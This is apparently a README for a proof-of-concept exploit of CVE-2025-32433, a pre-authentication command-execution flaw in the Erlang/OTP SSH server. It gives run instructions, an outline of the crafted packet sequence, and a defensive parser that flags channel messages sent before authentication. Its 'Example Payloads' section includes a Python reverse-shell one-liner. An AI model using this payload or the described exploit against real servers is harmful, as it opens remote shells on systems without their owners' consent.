            <h1>CVE-2025-32433 – Erlang/OTP SSH RCE Vulnerability</h1>
<h2>📌 Summary</h2>
<p>
  <strong>CVE-2025-32433</strong> is a <strong>remote code execution (RCE)</strong> vulnerability affecting the Erlang/OTP SSH daemon.
  The root cause is improper handling of SSH channel requests that arrive <em>before authentication</em>: the server processes
  connection-protocol messages from a client that has not authenticated, so a crafted request can cause arbitrary command execution
  <strong>before authentication</strong>.
  The included PoC demonstrates sending such crafted SSH packets; by default it writes <code>/lab.txt</code> on the target but can be adapted to run other commands.
</p>
<div style="background:#fef2f2; border-left:4px solid #ef4444; padding:10px; border-radius:6px; margin:16px 0;">
  ⚠️ <strong>Disclaimer:</strong> This repository is for <strong>educational and research purposes only</strong>. 
  Do not use against systems without explicit permission.
</div>
<h2>🛠️ Usage</h2>
<ol>
  <li>Edit target details in the PoC script:</li>
</ol>
<pre><code>HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
</code></pre>
<ol start="2">
  <li>Run the exploit:</li>
</ol>
<pre><code>python3 cve-2025-32433.py
</code></pre>
<p>
  By default it creates <code>/lab.txt</code> containing <code>pwned</code>. 
  Modify the payload in <code>build_channel_request</code> to run your own commands.
</p>
<h2>🧩 Example Payloads</h2>
<pre><code># Write a file
file:write_file("/lab.txt", <<"pwned">>).
# Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect((\"127.0.0.1\",2222));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2); import pty; pty.spawn(\"sh\")'")
</code></pre>
<h2>🔧 How the PoC Works (short)</h2>
<ul>
  <li>Connects to the SSH service and exchanges banners.</li>
  <li>Sends a crafted <code>SSH_MSG_KEXINIT</code> to look like a normal handshake.</li>
  <li>Sends <code>SSH_MSG_CHANNEL_OPEN</code> and <code>SSH_MSG_CHANNEL_REQUEST</code> with an <code>exec</code> payload <em>before authentication</em>.</li>
  <li>If vulnerable, the server executes the supplied Erlang command.</li>
</ul>
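<p>
  As an added example (not part of this repository or of Matt Keeley's PoC), the following check parses an unencrypted client-to-server SSH byte stream
  and flags connection-protocol (channel) messages that appear before key exchange completes, which is the pre-authentication shape described above.
  It assumes the stream starts right after the version banner; the message numbers come from RFC 4250, and the packet builder and sample streams are constructed for the example.
</p>

```python
import struct

# SSH message numbers (RFC 4250 / RFC 4253 / RFC 4254).
SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98
CHANNEL_MSGS = range(90, 101)  # connection-protocol (channel) messages

def iter_packets(stream: bytes):
    """Yield the payload of each SSH binary packet (RFC 4253 section 6) in a raw
    client-to-server stream that begins after the banner; stop on a bad length."""
    off = 0
    while off + 5 <= len(stream):
        (packet_len,) = struct.unpack(">I", stream[off:off + 4])
        pad_len = stream[off + 4]
        if packet_len < pad_len + 1 or off + 4 + packet_len > len(stream):
            break
        yield stream[off + 5:off + 5 + packet_len - pad_len - 1]
        off += 4 + packet_len

def find_preauth_channel_msgs(stream: bytes) -> list:
    """Return message numbers of channel messages sent in plaintext before key
    exchange finished. A well-behaved client only sends channel messages encrypted,
    after NEWKEYS and user authentication, so any plaintext 90-100 is the pre-auth pattern."""
    hits = []
    for payload in iter_packets(stream):
        if not payload:
            continue
        msg = payload[0]
        if msg == SSH_MSG_NEWKEYS:
            break  # everything after NEWKEYS is encrypted; stop parsing
        if msg in CHANNEL_MSGS:
            hits.append(msg)
    return hits

def pkt(payload: bytes) -> bytes:
    """Frame `payload` as one unencrypted SSH binary packet (sample-data helper)."""
    pad = (8 - (5 + len(payload)) % 8) % 8
    if pad < 4:
        pad += 8
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + b"\0" * pad

# Constructed sample streams (not real captures).
# KEXINIT followed directly by CHANNEL_OPEN and CHANNEL_REQUEST, no auth in between:
SUSPICIOUS_STREAM = (pkt(bytes([SSH_MSG_KEXINIT]) + b"\0" * 16)
                     + pkt(bytes([SSH_MSG_CHANNEL_OPEN]) + b"session") + pkt(bytes([SSH_MSG_CHANNEL_REQUEST]) + b"exec"))
# KEXINIT, KEXDH_INIT (30), NEWKEYS: a client that finishes key exchange first.
NORMAL_STREAM = pkt(bytes([SSH_MSG_KEXINIT]) + b"\0" * 16) + pkt(bytes([30])) + pkt(bytes([SSH_MSG_NEWKEYS]))
```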
<h2>🙏 Credits</h2>
<p>
  Discovery and write-up by <strong>Matt Keeley</strong> (Platform Security).  
  Thanks to him for publishing the PoC and sharing details.  
</p>
<p>
  Blog link: <a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">https://platformsecurity.com/blog/CVE-2025-32433-poc</a>
</p>
<h2>📚 References</h2>
<ul>
  <li><a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">Matt Keeley’s blog</a></li>
  <li><a href="https://www.erlang.org/news" target="_blank">Erlang/OTP Security Advisories</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32433" target="_blank">MITRE CVE Record</a></li>
</ul>
<h2>File snapshot</h2>
<pre><code>[4.0K]  /data/pocs/de03ba7e4d9ce80b5d83a7e2ce2d4102b609a62a
├── [4.1K]  exploit.py
└── [2.8K]  README.md
0 directories, 2 files
</code></pre>